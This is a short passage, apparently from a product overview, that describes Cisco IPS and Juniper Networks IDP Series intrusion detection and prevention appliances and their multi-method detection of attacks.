Cisco IPS protects against increasingly sophisticated attacks, including Directed attacks, Worms, Botnets, Malware, Application abuse.

Juniper Networks Intrusion Detection & Prevention (IDP)

Juniper Networks IDP Series Intrusion Detection and Prevention Appliances, with Multi-Method Detection (MMD), offer impressively comprehensive coverage by leveraging multiple detection mechanisms.
For example, by using signatures together with other detection methods such as protocol anomaly and traffic anomaly detection, the IDP Series appliances can thwart known attacks as well as possible future variations of them.
